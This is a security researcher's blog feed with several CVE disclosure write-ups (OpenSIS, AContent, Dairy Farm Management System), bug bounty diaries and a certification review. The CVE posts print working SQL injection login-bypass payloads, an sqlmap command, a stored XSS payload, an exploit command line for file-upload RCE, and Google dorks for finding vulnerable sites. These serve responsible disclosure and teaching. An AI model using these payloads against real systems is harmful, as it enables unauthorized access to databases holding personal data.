<p>Alright now for the fun data and statistics. The data and screenshots below are what is required to reach Top 100 on Bugcrowd (at the time of writing this article):</p>
<ul>
<li>Bugs Submitted: 313</li>
<li>Bugs Accepted: 131</li>
<li>Duplicate Bugs: 89</li>
<li>Rejected Bugs: 86 (this is largely due to how Bugcrowd handles NGPT/ CPT engagements)</li>
<li>Pending Bugs: 7</li>
</ul>
<p><img src="/assets/images/bugbounty/1.png" alt="" /></p>
<p>Figure 1: Volume of Submitted Bugs Over Time</p>
<p><img src="/assets/images/bugbounty/2.png" alt="" /></p>
<p>Figure 2: Severity of Submitted Bugs Over Time</p>
<p><img src="/assets/images/bugbounty/3.png" alt="" /></p>
<p>Figure 3: Technical Severity Breakdown</p>
<p><img src="/assets/images/bugbounty/4.png" alt="" /></p>
<p>Figure 4: Number of Submitted Bugs per Category</p>
<p><img src="/assets/images/bugbounty/5.png" alt="" /></p>
<p>Figure 5: Points, Rank, Accuracy</p>
<p><img src="https://hitcounter.pythonanywhere.com/count/tag.svg?url=https%3A%2F%2Fcinzinga.com%2FBug-Bounty-top-100%2F" alt="Hits" /></p>cinzingaToday marks a huge personal milestone in my bug bounty hunting career. I have achieved an all-time ranking of top 100 on Bugcrowd. This accomplishment comes just 11 months after first creating an account on the Bugcrowd platform. In this blog post I will endeavor to highlight a few things I have learned along the way. This blog post will contain some insights into the types and number of bugs I have submitted as well as any miscellaneous tips I think of while writing this.CVE-2020-66372020-08-23T00:00:00+00:002020-08-23T00:00:00+00:00https://cinzinga.com/CVE-2020-6637<p>OpenSIS v7.3 is vulnerable to unauthenticated SQL injection via the ‘username’ field, this allows for remote database compromise as well as authentication bypass. The following is a brief write-up of the identification, exploitation, and reporting of <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6637">CVE-2020-6637</a>.</p>
<h2 id="the-software">The Software</h2>
<p><a href="https://en.wikipedia.org/wiki/OpenSIS">Wikipedia</a> describes OpenSIS as the following:</p>
<blockquote>
<p>OpenSIS is one of several free and open source student information system available to K-12 and higher education institutions. The solution has been in development for several years and appears to have much of the functionality that long time commercial versions have.</p>
</blockquote>
<p>The community edition of the software can be obtained <a href="https://sourceforge.net/projects/opensis-ce/">here</a>.</p>
<p>Selecting software to review for vulnerabilities can be very hit or miss. There are a handful of reasons I decided to look into this software:</p>
<ol>
<li>Written in PHP with a SQL database. This is often a recipe for vulnerabilities.</li>
<li>History of vulnerabilities on <a href="https://www.exploit-db.com/search?q=opensis">Exploit-DB</a>, if bugs existed in the past, more will likely exist in the future.</li>
<li>This software is a school information system. That means it protects a lot of juicy PII and the impact of any bugs is greatly magnified.</li>
</ol>
<h2 id="the-bug">The Bug</h2>
<p>After installing OpenSIS locally, one will be greeted with the following login screen.</p>
<p><img src="/assets/images/Exploit-Dev/OpenSIS/1.png" alt="" /></p>
<p>Checking for SQL injection on the login page is perhaps one of the quickest and easiest check one can perform when analyzing a web application. It takes just a few seconds to drop a <code class="language-plaintext highlighter-rouge">'</code> in the username password fields and pray for that <code class="language-plaintext highlighter-rouge">Error in your SQL Synax</code> message.</p>
<p>Lo and behold… <br />
<img src="/assets/images/Exploit-Dev/OpenSIS/2.png" alt="" /></p>
<p>Not only does the web application tell us we have an error in our SQL syntax, it also provides an incredibly detailed error message that includes the whole SQL query. At this point, one could fire up SQLMap and exploit this error based SQL injection; however, let’s first look at the error message and code further.</p>
<p>Line 117 of index.php is show below.</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="nv">$login_uniform</span> <span class="o">=</span> <span class="nf">DBGet</span><span class="p">(</span><span class="nf">DBQuery</span><span class="p">(</span><span class="s1">'SELECT * FROM login_authentication WHERE UPPER(USERNAME)=UPPER(\''</span> <span class="mf">.</span> <span class="nv">$username</span> <span class="mf">.</span> <span class="s1">'\') AND UPPER(PASSWORD)=UPPER(\''</span> <span class="mf">.</span> <span class="nv">$password</span> <span class="mf">.</span> <span class="s1">'\')'</span><span class="p">));</span>
</code></pre></div></div>
<p>Placing a SQL query directly in PHP code is never a recommended practice. In the photo above, it is clear where our <code class="language-plaintext highlighter-rouge">'</code> is reflected in the SQL string.</p>
<p>Payload: <code class="language-plaintext highlighter-rouge">'</code><br />
SQL Query:</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">login_authentication</span> <span class="k">WHERE</span> <span class="k">UPPER</span><span class="p">(</span><span class="n">USERNAME</span><span class="p">)</span><span class="o">=</span><span class="k">UPPER</span><span class="p">(</span><span class="k">NULL</span><span class="s1">') AND UPPER(PASSWORD)=.....
</span></code></pre></div></div>
<p>Thus by changing our payload slightly we may be able to utilize tautology to cause this query to return <code class="language-plaintext highlighter-rouge">true</code>.</p>
<p>Payload: <code class="language-plaintext highlighter-rouge">') or 1=1;-- -</code><br />
SQL Query:</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">login_authentication</span> <span class="k">WHERE</span> <span class="k">UPPER</span><span class="p">(</span><span class="n">USERNAME</span><span class="p">)</span><span class="o">=</span><span class="k">UPPER</span><span class="p">(</span><span class="k">NULL</span><span class="s1">') or 1=1;-- -) AND UPPER(PASSWORD)=.....
</span></code></pre></div></div>
<p><img src="/assets/images/Exploit-Dev/OpenSIS/3.png" alt="" /></p>
<p>Interestingly enough, this returned an <code class="language-plaintext highlighter-rouge">INSERT</code> SQL statement, but upon refreshing the page, one would be logged in as the administrator.</p>
<p><img src="/assets/images/Exploit-Dev/OpenSIS/4.png" alt="" /></p>
<p>A video POC is shown below against the OpenSIS demo site.</p>
<p><a href="https://www.youtube.com/watch?v=IDc_3kwse5Q"><img src="https://img.youtube.com/vi/IDc_3kwse5Q/0.jpg" alt="Video POC" /></a></p>
<p>(Note: after contacting OpenSIS I was given explicit permission to demonstrate this vulnerability against their demo site)</p>
<h2 id="timeline">Timeline</h2>
<p>7 January 2020 - Bug discovered and reported to OpenSIS.<br />
8 January 2020 - Response recieved and video POC requested.<br />
8 January 2020 - CVE reserved.<br />
13 January 2020 - Issue patched. <br />
16 January 2020 - Code pushed to SourceForge. <br />
23 August 2020 - Sufficient time has passed, CVE publicly disclosured via blog post.</p>
<p><img src="/assets/images/Exploit-Dev/OpenSIS/5.png" alt="" /></p>
<h2 id="conclusion">Conclusion</h2>
<p>While using this simple SQL tautology no longer bypasses authentication, the newest version of OpenSIS still throws a verbose SQL syntax error if a <code class="language-plaintext highlighter-rouge">'</code> is submitted upon login. Thus, database compromise still may be possible with the assistance of SQLMap. Preliminary Google Dork-ing reveals the existance of many school using OpenSIS with each being (potentially) vulnerable to unauthenticated SQL injection.</p>
<p><img src="/assets/images/Exploit-Dev/OpenSIS/6.png" alt="" /></p>
<p><img src="https://hitcounter.pythonanywhere.com/count/tag.svg?url=https%3A%2F%2Fcinzinga.com%2FCVE-2020-6637%2F" alt="Hits" /></p>cinzingaOpenSIS v7.3 is vulnerable to unauthenticated SQL injection via the ‘username’ field, this allows for remote database compromise as well as authentication bypass. The following is a brief write-up of the identification, exploitation, and reporting of CVE-2020-6637.100 Days of Bug Hunting2020-07-13T00:00:00+00:002020-07-13T00:00:00+00:00https://cinzinga.com/Bug-Bounty<p>On April 1st 2019, I decided to try my hand at bug bounty hunting. What started initially as a short experiment quickly evolved into a daily obsession and a full-time hobby. In this post I will talk briefly about my experiences and impressions.</p>
<h2 id="preface">Preface</h2>
<p>From my time in the InfoSec Prep discord, as well as on Twitter, I gleaned the community’s views on bug bounty hunting are very polarized. Half consider it to be a scam - slave labor - where big name companies outsource their security and underpay researchers. Then, there are the other half who point to influential members of the community such as Stok and NahamSec who make a living off such work. There are even researchers like Dawgyg who <a href="https://twitter.com/thedawgyg/status/1210293014586777600">publicly expresses their displeasure for not making $1mil in 1 year off of their bug bounty work</a>! Thus, I decided to just dive in headfirst and see where my views aligned after a set period of time.</p>
<h2 id="goals">Goals</h2>
<p>Initially I sat down to hash out my goals for this endeavor. I did not simply want to aimlessly throw payloads at websites for a month without any end goal. After a bit of thought I determined the following (in order of increasing difficulty):</p>
<ul>
<li>Find at least one valid, paid bug (not a duplicate)</li>
<li>Purchase a Burp Pro license with the profits
<ul>
<li>The Burp Pro trial is 30 days, so this seemed like a good goal to add</li>
</ul>
</li>
<li>See how high of a rank I could achieve in 1 month</li>
<li>Determine if this venture is viable long term for a beginner like myself</li>
</ul>
<p>To preface any further discussion, the fact that I am writing this after three months as opposed to just one, should give some indication that the answer to the final bullet point is “yes”.</p>
<h2 id="30-days-and-beyond">30 Days… and Beyond</h2>
<p>Starting out, I decided to hunt on BugCrowd. I cannot exactly tell you why I chose them; however, I can tell you that I am happy I did. HackerOne (H1) antidotally seems to be the bigger name in bug bounty hunting, but I am not sure why. Personally, I fell in love with BugCrowd (BC) and found myself hunting with them daily. Perhaps the main advantage BC has to H1 is that duplicates on BC still receive points. This helps beginners like me feel more accomplished and gain rank despite not being the first to find a bug. Moreover, after some shaky and <code class="language-plaintext highlighter-rouge">Not Applicable</code> submissions on BC, I had a huge stroke of beginner’s luck. Within my first week I found a Priority 2 (P2) stored XSS on one of the largest travel sites in the world. Not long after that (and after many more duplicates) I began to receive private invites.</p>
<p>In my opinion, private invites are a core of component of bug bounty hunting success. Thousands of researchers aimlessly stab at public programs and they are extremely picked over. Thus, getting into a more selective program is almost a pre-requisite to ranking up and succeeding. In another stroke of beginner’s luck one of my first private programs ended up becoming both my most lucrative and favorite company to hunt for. I became enthralled with bug hunting. Each day I hunted from approximately 6AM to Noon.</p>
<p>Remember my goals outlined above? My first paid bug actually knocked out goal #1 and #2 simultaneously. It felt very good to have used the Burp Pro trial to earn enough to buy a full Burp Pro license for myself. Additionally, in my first 30 days I had climbed globally from ~96,000 in rank to top 2500. However, while the money and the rank were cool accomplishments, I found the knowledge gained through these endeavors to be priceless. I am extremely gifted to have patient and understanding mentors from the InfoSec Prep discord (mainly <a href="https://twitter.com/TibSec">Tib3rius</a>) that advise me almost daily. This alone was enough to keep me coming back. Thus, I continued bug hunting for another month … and another, until finally I decided this blog post was long overdue.</p>
<p>At the end of 100 days my notable stats are as follows:</p>
<ul>
<li>Top 330 on BugCrowd (top 0.35% globally)</li>
<li>Background checked on BugCrowd (“Next Gen Pen Test” eligible)</li>
<li>Four critical submission (SQLi)</li>
<li>Applied and accepted to Synack Red Team</li>
<li>Enough rewards to buy 100 years of Burp Pro licenses</li>
</ul>
<p>Ironically enough in this time I have never submitted a paid bug to HackerOne. This is on my to-do list and I feel as though I need to become more established there; however, with two other sites to hack for I find my time is limited.</p>
<h2 id="conclusion">Conclusion</h2>
<p>As a college student, bug bounty hunting has been an amazing opportunity. It has allowed me to target actual websites to hone my web application testing skill while simultaneously practice writing short reports. The knowledge gained has been free and beyond that of any certification I have taken thus far. I fully intend to continue learning and submitting bugs as I can while finishing my degree. Perhaps at that point in time I will choose to pursue this as a full-time career. It’s tough to know for certain but success is easily obtainable for those who put in the hours each day. There is no “big secret” to bug hunting that you will learn from YouTube videos or blog posts, simply dedicate the time and you will see the results. Go start hunting today!</p>
<h2 id="profiles">Profiles</h2>
<p><a href="https://bugcrowd.com/cinzinga">BugCrowd</a></p>
<p><a href="https://hackerone.com/cinzinga">HackerOne</a></p>
<p>Synack.- private.</p>
<p><img src="https://hitcounter.pythonanywhere.com/count/tag.svg?url=https%3A%2F%2Fcinzinga.github.io%2FBug-Bounty%2F" alt="Hits" /></p>cinzingaOn April 1st 2019, I decided to try my hand at bug bounty hunting. What started initially as a short experiment quickly evolved into a daily obsession and a full-time hobby. In this post I will talk briefly about my experiences and impressions.CRTP Exam Review2020-05-25T00:00:00+00:002020-05-25T00:00:00+00:00https://cinzinga.com/CRTP-Review<p>This last week I took and passed the Certified Red Team Professional exam. <a href="https://www.pentesteracademy.com/activedirectorylab">Certified Red Team Professional (CRTP)</a> is the introductory level Active Directory Certification offered by Pentester Academy. The course is taught by Nikhil Mittal, who is the author of <a href="https://github.com/samratashok/nishang">Nishang</a> and frequently speaks at various conventions.</p>
<h2 id="labs">Labs</h2>
<p>The course is very well made and quite comprehensive. The provided materials are 30+ videos, a PDF of the slides, and a PDF with exercise solutions. The videos can easily be watched at 1.5x speed to work through the material at a rapid pace. There are 3-5 learning objectives after each course topic that allow the student to gain hands on experience in the simulated active directory lab.</p>
<p>One key thing to note is that the labs are educational labs, not challenge labs like in PWK. This means that the course walks you through the steps to get Domain Admin and Enterprise Admin, the student does not get to go out and practice on their own. Thus, once the student knows the path to DA it is static and does not change.</p>
<p>The course covers many great topics. These topics include manual AD enumeration and the use BloodHound, privilege escalation and persistence, and detection and defense.</p>
<p>I personally booked 30 days of CRTP lab time and I felt like this was sufficient time to work through the course materials and practice most learning objectives twice.</p>
<p><img src="/assets/images/CRTP/1.png" alt="" /></p>
<h2 id="exam">Exam</h2>
<p>In my opinion the exam truly made this course worth it. The exam contains 5 machines that the user must pivot between in order to obtain command execution on each of them. This must be accomplished in 24 hours with another 48 hours to write a professional findings report. The exam instructions provide the student with a large hint in case you find yourself stuck. They state that no brute forcing with a dictionary is required. So, if you find yourself trying certain domain privilege escalation attacks that required cracking, know that you are in a rabbit hole.</p>
<p>Most of the pivots require additional research and careful examination of findings. The first pivot was the most difficult and took me about 6 hours to achieve. After that the second pivot was medium difficulty, taking about 2 hours. At this point, the last three pivots are trivial and took me about 2 hours total. I started the exam at 8AM and had fully compromised the exam network by 6PM.</p>
<p>I strongly recommend getting familiar with BloodHound and learning what each node/ edge represents.</p>
<p>In the end my lab report totaled about 20 pages and for my efforts I was awarded the CRTP two days after submitting it.</p>
<h2 id="conclusion">Conclusion</h2>
<p>I highly recommend CRTP for those like me who have OSCP but feel as though they lack active directory experience. I greatly enjoyed how I did not have to use a VM for the course since students RDP directly into their foothold machine. Everything in the course is done via PowerShell which provided a great learning experience. Moreover, the course can be completed relatively quickly in just 30 days. In the future I will definitely consider taking the level 2 AD course: CRTE.</p>
<p><img src="/assets/images/CRTP/2.png" alt="" /></p>
<p><img src="https://hitcounter.pythonanywhere.com/count/tag.svg?url=https%3A%2F%2Fcinzinga.github.io%2FCRTP-Review%2F" alt="Hits" /></p>cinzingaThis last week I took and passed the Certified Red Team Professional exam. Certified Red Team Professional (CRTP) is the introductory level Active Directory Certification offered by Pentester Academy. The course is taught by Nikhil Mittal, who is the author of Nishang and frequently speaks at various conventions.CVE-2020-105572020-03-13T00:00:00+00:002020-03-13T00:00:00+00:00https://cinzinga.com/CVE-2020-10557<p>This post a brief description of the discovery and development of <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10557">CVE-2020-10557</a>.</p>
<h2 id="background">Background</h2>
<p><a href="https://github.com/atutor/AContent">AContent</a>
is a free web content and authoring tool made by the same authors as <a href="https://github.com/atutor/ATutor">Atutor</a>. This application has a history of vulnerabilities on Exploit-db, thus I expected to find more in the newest release. For the purposes of CVE testing, I aim to avoid accounts with administrator privileges to better gauge just how much damage a malicious low privileged user could accomplish. Conveniently, AContent allows for open registration of both student and teacher accounts. Since the teacher accounts have slightly more privileges, I decided to use that account.</p>
<p><img src="/assets/images/Exploit-Dev/AContent/1.png" alt="" /><br />
<em>Figure 1: Registration Page with Check Box for Content Creator Account</em></p>
<p>After further exploration of the site I discovered an area for file uploads, always a great place to begin looking for unusual behavior or potential vulnerabilities. Shortly after trying some combinations of file extension bypass payloads, I determined that both <code class="language-plaintext highlighter-rouge">.php7</code> and <code class="language-plaintext highlighter-rouge">.phtml</code> were not rejected by the web application. Thus, one could upload a malicious web shell in order to execute commands against the web server.</p>
<p><img src="/assets/images/Exploit-Dev/AContent/2.png" alt="" /><br />
<em>Figure 2: Successful File Upload Restriction Bypass and RCE</em></p>
<h2 id="the-exploit">The Exploit</h2>
<p>Great, so now we at least know we have a CVE for unrestricted file upload leading to RCE; however, with this CVE I wanted to try something a little different. I wanted to attempt to script a fully functional exploit to allow a user to execute commands against the server via their terminal without needed to manually exploit.</p>
<p>After struggling for way too long with Python3 and troubleshooting silly typos, I eventually got a semi-functional exploit working. I say “semi-functional” as there are two caveats. First, the user must supply a valid session cookie via command line parameters, meaning they must log in and determine this using <code class="language-plaintext highlighter-rouge">document.cookie</code>. Originally my aim was to simply pass username and password into the exploit via command line; however, I encountered some errors that I was unable to troubleshoot and thus determined using the cookie would be simpler. Second, the user must also know their author number. This number can easily be determined with Burp Suite. Alternatively, it can be brute forced as the number simply increments by <code class="language-plaintext highlighter-rouge">1</code> with each new account created, thus one could script the exploit until they see a successful completion. The completed exploit can be found <a href="https://github.com/cinzinga/CVEs/tree/master/CVE-2020-10557">here</a>.</p>
<p>Now, without further delay, I present CVE-2020-10557!</p>
<p><code class="language-plaintext highlighter-rouge">python3 cve-2020-10557.py -url http://192.168.0.21/AContent/ -cookie 58n37v64bq3teoi097koae8f01 -author 9</code></p>
<p><img src="/assets/images/Exploit-Dev/AContent/3.png" alt="" /><br />
<em>Figure 3: Successful Exploitation via Command Line</em></p>
<h2 id="impact">Impact</h2>
<p>After reaching out to the developer, I saw that this project has been unmaintained for two years. I highly recommend that the two live websites still running AContent find another web application to meet their needs.</p>
<p><img src="/assets/images/Exploit-Dev/AContent/4.png" alt="" /><br />
<em>Figure 4: Sites running AContent</em></p>
<h2 id="acknowledgements">Acknowledgements</h2>
<p>I would like to thank <a href="https://m0rph-1.github.io/">m0rph-1</a> and <a href="https://tib3rius.com/">Tib3rius</a> for putting up with all my amateur Python coding questions.</p>
<p><img src="https://hitcounter.pythonanywhere.com/count/tag.svg?url=https%3A%2F%2Fcinzinga.github.io%2FCVE-2020-10557%2F" alt="Hits" /></p>cinzingaThis post a brief description of the discovery and development of CVE-2020-10557.February Updates2020-02-14T00:00:00+00:002020-02-14T00:00:00+00:00https://cinzinga.com/February-Updates<p>I figure it is about time for another blog post, as it has been just over one month since my last one. However, I am feeling a little lazy so in this entry I will simply list accomplishments and noteworthy things that have occurred in the last 30 days or so. Honestly each of these on their own warrants a blog post, perhaps in the future I will come back and expand on each of them more.</p>
<h2 id="publications">Publications</h2>
<ul>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6637">CVE-2020-6637</a>
<ul>
<li>This CVE’s status is still ‘reserved’ because I am allowing the vendor 90 days from discovery before publication.</li>
</ul>
</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7208">CVE-2020-7208</a>
<ul>
<li>This vulnerability was a joint discovery with <a href="https://github.com/m0rph-1">m0rph-1</a>.</li>
</ul>
</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7209">CVE-2020-7209</a>
<ul>
<li>This vulnerability was a joint discovery with <a href="https://github.com/m0rph-1">m0rph-1</a>.</li>
</ul>
</li>
</ul>
<h2 id="certifications">Certifications</h2>
<ul>
<li>
<p><a href="https://www.virtualhackinglabs.com/?courses=penetration-testing">Penetration Testing Course</a></p>
</li>
<li>
<p><a href="https://www.virtualhackinglabs.com/?courses=penetration-testing">Penetration Testing Course Advanced+</a></p>
</li>
</ul>
<p>I personally found Virtual Hacking Labs to be very fun and a good change of pace. I enjoyed the flat network topology, so I did not have to worry about dependencies or tunneling. The boxes were generally on the easier side, taking me just 14 days to root 41 machines. Only complaint was that too many privilege escalation routes depended on kernel exploits. Additionally, I found the number of Windows machines to be lacking. However, it was definitely a fun cyber range.</p>
<h2 id="projects">Projects</h2>
<ul>
<li>
<p>Cowrie Honeypot <br />
Recently I set up a honeypot using the Cowrie software. All captured malware samples can be viewed <a href="https://github.com/cinzinga/HoneypotStuff/tree/master/Samples">here</a>. This is purely for personal entertainment as I like to see how many times it gets attacked each day, what commands the bots run, and what malware samples I can catch and identify.</p>
</li>
<li>
<p>GitHub_Autopwn<br />
I can hardly call this a project of my own; however, it is the child of a discussion m0rph-1 and I had one evening. Both he and I enjoy hunting for CVEs, we thought that a great tool to aid in identification of vulnerabilities would be a static code analyzer that can be directed at a GitHub repository. This way it would save us the time of cloning a repo and then running a code analyzer. He is an amazing coder and wrote it in about 24 hours. It helped us in earning CVE-2020-7208 & 7209. The code can be viewed <a href="https://github.com/m0rph-1/github_autopwn">here</a>.</p>
</li>
</ul>
<h2 id="other">Other</h2>
<ul>
<li>Promotion to Discord Moderator <br />
If you have read some of my other posts, you will notice I mention the <a href="https://discord.gg/TyZpfAs">InfoSec-Prep Discord</a> often. This server contains over 5000 cyber security students or professions, including just shy of 600 OSCP certified members. It is a phenomenal place to learn and share ideas.</li>
</ul>
<p><img src="https://hitcounter.pythonanywhere.com/count/tag.svg?url=https%3A%2F%2Fcinzinga.github.io%2FFebruary-Updates%2F" alt="Hits" /></p>cinzingaI figure it is about time for another blog post, as it has been just over one month since my last one. However, I am feeling a little lazy so in this entry I will simply list accomplishments and noteworthy things that have occurred in the last 30 days or so. Honestly each of these on their own warrants a blog post, perhaps in the future I will come back and expand on each of them more.CVE-2020-5307 & CVE-2020-53082020-01-07T00:00:00+00:002020-01-07T00:00:00+00:00https://cinzinga.com/CVE-2020-5307-5308<p>Dairy Farm Management System is vulnerable to SQLi and XSS. This post will be a brief write up about discovery and exploitation of CVE-2020-5307 & CVE-2020-5308. These vulnerabilities exist in the Dairy Farm Shop Management System project version 1, available <a href="https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/">here</a>. These discoveries came as a continuation of my previous efforts which uncovered <a href="https://cinzinga.github.io/CVE-2019-19908/">CVE-2019-19908</a>.</p>
<h2 id="cve-2020-5307">CVE-2020-5307</h2>
<p>After installing the app locally, the user is greeted with a login screen. For now, I am going to see how far I can get without knowing the default administrator account’s credentials.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/1.png" alt="" /><br />
<em>Figure 1: DFSMS Login Page</em></p>
<p>Let’s fire up Burp Suite and capture the login request for future testing with SQLmap.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/2.png" alt="" /><br />
<em>Figure 2: Captured POST Request</em></p>
<p>Saving this request to a file, we can then target the ‘username’ and ‘password’ parameters to check for the existence of SQL injection. The command will look like:</p>
<p><code class="language-plaintext highlighter-rouge">sqlmap -r login.req –dbms=mysql -o</code></p>
<p>The <code class="language-plaintext highlighter-rouge">-r</code> option tells SQLmap to accept a request file.<br />
The <code class="language-plaintext highlighter-rouge">--dbms</code> option specifies the database management service. This avoids unnecessary checks for PostgreSQL or MsSQL databases.<br />
The <code class="language-plaintext highlighter-rouge">-o</code> option performs optimization, such as using persistent HTTP connection and running with more threads.</p>
<p>Almost right away, SQLmap discovers that the ‘username’ parameter is vulnerable. Moreover, SQLmap notifies us that there is a 302-redirect request from the website to a new page. This is indicative of the existence of authentication bypass using SQL injection. This will be explored further next.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/3.png" alt="" /><br />
<em>Figure 3: ‘username’ SQL Injection and 302-redirect</em></p>
<p>Thus, as an unauthenticated user we can dump the entire database’s contents. Really milking the Dairy Farm Management System for all it’s got.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/4.png" alt="" /><br />
<em>Figure 4: Database Contents</em></p>
<p>Shifting our focus back to that 302-redirect, we again return to the login page where we can try the most basic SQL authentication bypass payloads.</p>
<p>Username: <code class="language-plaintext highlighter-rouge">admin' or '1' = '1'; -- -</code> <br />
Password: <code class="language-plaintext highlighter-rouge">a</code></p>
<p>In a nutshell, this injection will break the SQL query and cause the database to evaluate <code class="language-plaintext highlighter-rouge">1 = 1</code> which results as true. The semicolon ends the query statement and the dashes comment out everything after it. Since the query returns true, we should be authenticated as the admin user.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/5.png" alt="" /><br />
<em>Figure 5: Successful Authentication Bypass</em></p>
<p>As it turns out, this web application is vulnerable to a herd-full of SQL injections. Once authenticated I discovered 10 more that I will not document here out of a desire for brevity. Submission of these multiple SQL injections to MITRE earned me <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5307">CVE-2020-5307</a>.</p>
<h2 id="cve-2020-5308">CVE-2020-5308</h2>
<p>After briefly exploring the internals of the web application and learning its functionality, I began to test for the presence of cross-site scripting. I expected to find quite a few as I knew from the SQL injection that user inputs were not being sufficiently sanitized.</p>
<p>Part of the web app allows the user to create custom product categories. Next, let’s create a category named <code class="language-plaintext highlighter-rouge"><script>alert(‘moo’)</script></code> and see what happens when we change pages to view all categories.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/6.png" alt="" /><br />
<em>Figure 6: Potential XSS Payload</em></p>
<p>Once a user navigates to the manage categories page…</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/7.png" alt="" /><br />
<em>Figure 7: Successful Stored XSS</em></p>
<p>Elsewhere in this web application I discovered 3 more stored cross-site scripting vulnerabilities. Submission of these multiple stored XSS vulnerabilities resulted in <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5308">CVE-2020-5308</a></p>
<h2 id="impact">Impact</h2>
<p>The impact of these vulnerabilities is fairly minimal due to the lack of widespread popularity in this application. The application was released on December 29th, 2019 and currently has less than 500 downloads. A quick google dork reveals only one website that was running this web application, but that page now returns a 403 error.</p>
<p>Google Dork: <code class="language-plaintext highlighter-rouge">Dairy Farm Shop Management System intitle:"Login Page"</code></p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/8.png" alt="" /><br />
<em>Figure 8: Results of Google Dork</em></p>
<p>In conclusion, if you own a small dairy farm shop, I would recommend emailing with the authors of Dairy Farm Management System to enhance their platform, as I have done.</p>
<p><img src="https://hitcounter.pythonanywhere.com/count/tag.svg?url=https%3A%2F%2Fcinzinga.github.io%2FCVE-2020-5307-5308%2F" alt="Hits" /></p>cinzingaDairy Farm Management System is vulnerable to SQLi and XSS. This post will be a brief write up about discovery and exploitation of CVE-2020-5307 & CVE-2020-5308. These vulnerabilities exist in the Dairy Farm Shop Management System project version 1, available here. These discoveries came as a continuation of my previous efforts which uncovered CVE-2019-19908.